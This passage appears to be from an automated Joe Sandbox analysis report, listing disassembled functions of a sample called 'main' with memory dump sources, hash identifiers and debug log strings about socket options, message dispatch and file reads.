                                                                                                                                                  • Opcode Fuzzy Hash: 080e8fde5a2ba98204fe8d5300717fb1248164f312ba23c459eec33983392385
                                                                                                                                                  • Instruction Fuzzy Hash: 23F09661F0D54282F7505BEDF8005B96360ABC47D8F108235EE1D837A5DE7CD946C701
                                                                                                                                                  Function 00007FF8BA4F233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: fac0814526277d35c4ae5de8df6aa49abb8a23ef8b610365522404217a87e9a8
                                                                                                                                                  • Instruction ID: 7d0e35b8375e9d753062a057811b6269b886ae007a9bf495844f116486bfa8de
                                                                                                                                                  • Opcode Fuzzy Hash: fac0814526277d35c4ae5de8df6aa49abb8a23ef8b610365522404217a87e9a8
                                                                                                                                                  • Instruction Fuzzy Hash: 0DF0F6B1A0C10296F3205B6DBC405B62660EB847E4F008271EF5D837A4DF3CD64AC700
                                                                                                                                                  Function 00007FF8B915233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: 9528aeaa2bf256ae8ff0f18ad45033aaf4b3f86c5b89e20fedb4b7824a9256c1
                                                                                                                                                  • Instruction ID: 9675905ba5984215370ed3c1b91cc47f9745e2a17f9f0331bddb6e6b785d351b
                                                                                                                                                  • Opcode Fuzzy Hash: 9528aeaa2bf256ae8ff0f18ad45033aaf4b3f86c5b89e20fedb4b7824a9256c1
                                                                                                                                                  • Instruction Fuzzy Hash: C4F0F6A1B082824AF3505F1EB8001B66661AB883E4F108231EF5D837D4DF7CD589EB00
                                                                                                                                                  Function 00007FF8B9184EBA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: 4fd31f1ea14685cc47037a91840700bcfe726a69cab849f9c3268bbebf3dbd7d
                                                                                                                                                  • Instruction ID: dbd5bd8f07a5da5b8f0c47525de92ea1b5b8f5faafe28a441d3196e73335dc97
                                                                                                                                                  • Opcode Fuzzy Hash: 4fd31f1ea14685cc47037a91840700bcfe726a69cab849f9c3268bbebf3dbd7d
                                                                                                                                                  • Instruction Fuzzy Hash: C5F0F661B085828AF3105F1DA8406B56661AB843E4F108231EE2D83BD5DF7CD947EB00
                                                                                                                                                  Function 00007FF8BFB5247A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                                                                                                                                                  • Instruction ID: f9b76121b091e8bf4ddbd983e265edd573ea8f91927c2e3b0d11004730f14cfc
                                                                                                                                                  • Opcode Fuzzy Hash: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                                                                                                                                                  • Instruction Fuzzy Hash: 84F09661A0915296F7105F9DF8005A67760BB947D4F004231EF5D83BD4DF7CE545CB00
                                                                                                                                                  Function 00007FF8BFB3152A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: fd868c65be3afd4cf4706a3199d6f8f6826288c199685166dd3a51f61f000229
                                                                                                                                                  • Instruction ID: 48e0b97805db318802c7b9c02ab2419cece9deaf6ed4153e05c001858732126a
                                                                                                                                                  • Opcode Fuzzy Hash: fd868c65be3afd4cf4706a3199d6f8f6826288c199685166dd3a51f61f000229
                                                                                                                                                  • Instruction Fuzzy Hash: 9FF09661A4810346E310AFADB8405A56765BB847D4F508235EF6D837E4DE7CD949D700
                                                                                                                                                  Function 00007FF8BFB81A0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                                                                                                                                                  • Instruction ID: f8c01f93cc01feef4ef4e5cdb77bf74c3f573cb8a8c31f01d5d49b07241c880e
                                                                                                                                                  • Opcode Fuzzy Hash: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                                                                                                                                                  • Instruction Fuzzy Hash: CFF09661A0D15286F3105FADF8046B66760ABC47D4F048235EE6D83795DF7CD949CB00
                                                                                                                                                  Function 00007FF8BFB81A76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                                                                                                                  • API String ID: 1729277954-536111009
                                                                                                                                                  • Opcode ID: efdd2f4e0631f6d227b78a496f5860539d083fedbc232eec6b79c452b0d326fa
                                                                                                                                                  • Instruction ID: e0035c0396eadf7912557962a66d3eae1d985f310ec7c81925add4ad04bb38ab
                                                                                                                                                  • Opcode Fuzzy Hash: efdd2f4e0631f6d227b78a496f5860539d083fedbc232eec6b79c452b0d326fa
                                                                                                                                                  • Instruction Fuzzy Hash: 57F09061A0854286E3109FAEF8005756760AB887D4F10C331EA6D837A4DE3CD50ACB00
                                                                                                                                                  Function 00007FF8BFB8924C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: memsetstrchr
                                                                                                                                                  • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                                                                                                                                  • API String ID: 2564583029-4292814133
                                                                                                                                                  • Opcode ID: 6054bc854355412dd534d9800395cb815e31de645798f9446980f867bb94e619
                                                                                                                                                  • Instruction ID: 471846009eb15f8d0148469fee1f802491f413c298e58b7d902158506ede7860
                                                                                                                                                  • Opcode Fuzzy Hash: 6054bc854355412dd534d9800395cb815e31de645798f9446980f867bb94e619
                                                                                                                                                  • Instruction Fuzzy Hash: CA215122F0C55242FE2155ED68147B867404F82FF0F688331EF7D8A7D6DE1CA842D201
                                                                                                                                                  Function 00007FF8BA4F1780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BA4F1811
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8BA4F180A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: 8e0882bfb16548fdbf9dfd9db4ecb549daa1a64d832ac2d375aca87d32d6b52b
                                                                                                                                                  • Instruction ID: eca0ce0b99744f2f8c43a8dff48bf8f54c361dace6abfb9524bbc3a63872c1fe
                                                                                                                                                  • Opcode Fuzzy Hash: 8e0882bfb16548fdbf9dfd9db4ecb549daa1a64d832ac2d375aca87d32d6b52b
                                                                                                                                                  • Instruction Fuzzy Hash: 25217C32A0CB42C1EB208F5DE880169A3A0FB56BD4B145176DF4D877A4DF3CD941C700
                                                                                                                                                  Function 00007FF8B9151780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8B915180A
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B9151811
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: f8d29101610d8f76ac1ed4feefd51e892c0e55ef3eadb0d75f62bac78426d285
                                                                                                                                                  • Instruction ID: 90a9f288c0f04b3fdc422082309e99f4dc68bd75de7765265834ecdc89b1abc8
                                                                                                                                                  • Opcode Fuzzy Hash: f8d29101610d8f76ac1ed4feefd51e892c0e55ef3eadb0d75f62bac78426d285
                                                                                                                                                  • Instruction Fuzzy Hash: D5216D32A09AC286EB228F19F85016967A4FB44BD4F548135DF8E477A8DF3CE881E700
                                                                                                                                                  Function 00007FF8B918EE60 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B918EEF1
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8B918EEEA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: 6ceb723587c1d552a552b3ca08934bf7bc6d823551b69239d98c8e8180dbb2b5
                                                                                                                                                  • Instruction ID: 81c6790ab38e76af12fee2b21d678a56249cff04711593347faecb4257a60471
                                                                                                                                                  • Opcode Fuzzy Hash: 6ceb723587c1d552a552b3ca08934bf7bc6d823551b69239d98c8e8180dbb2b5
                                                                                                                                                  • Instruction Fuzzy Hash: 53212C32A08AC282E755DF19E88017867A4FB45BD4B544135DB9D87768DF3CE945E700
                                                                                                                                                  Function 00007FF8BFB89A40 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8BFB89ACA
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BFB89AD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: 5f07f7dd6c7a8ca443123c93aa7333b3264cb797661900b59e1563f9beebcf4d
                                                                                                                                                  • Instruction ID: dc023329bf1bd25f25b0379eca4aa750102418e81bad979789e348e1a7740482
                                                                                                                                                  • Opcode Fuzzy Hash: 5f07f7dd6c7a8ca443123c93aa7333b3264cb797661900b59e1563f9beebcf4d
                                                                                                                                                  • Instruction Fuzzy Hash: 36214F32A18A4685EB148F9DE88016977A0FB84FD8F548135DF8D47BA8DF3CD841C700
                                                                                                                                                  Function 00007FF6BE0327ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
                                                                                                                                                  • Instruction ID: 72424358975d12ac6c16a1493a684aaebbb0f0c82187ee8eb3da9ca974babeee
                                                                                                                                                  • Opcode Fuzzy Hash: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
                                                                                                                                                  • Instruction Fuzzy Hash: 42F08227B0860302F9729A1CB851BB911516F68764E4D4532EF4D8F7C1EE3DA8A7D300
                                                                                                                                                  Function 00007FF6BE0327F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
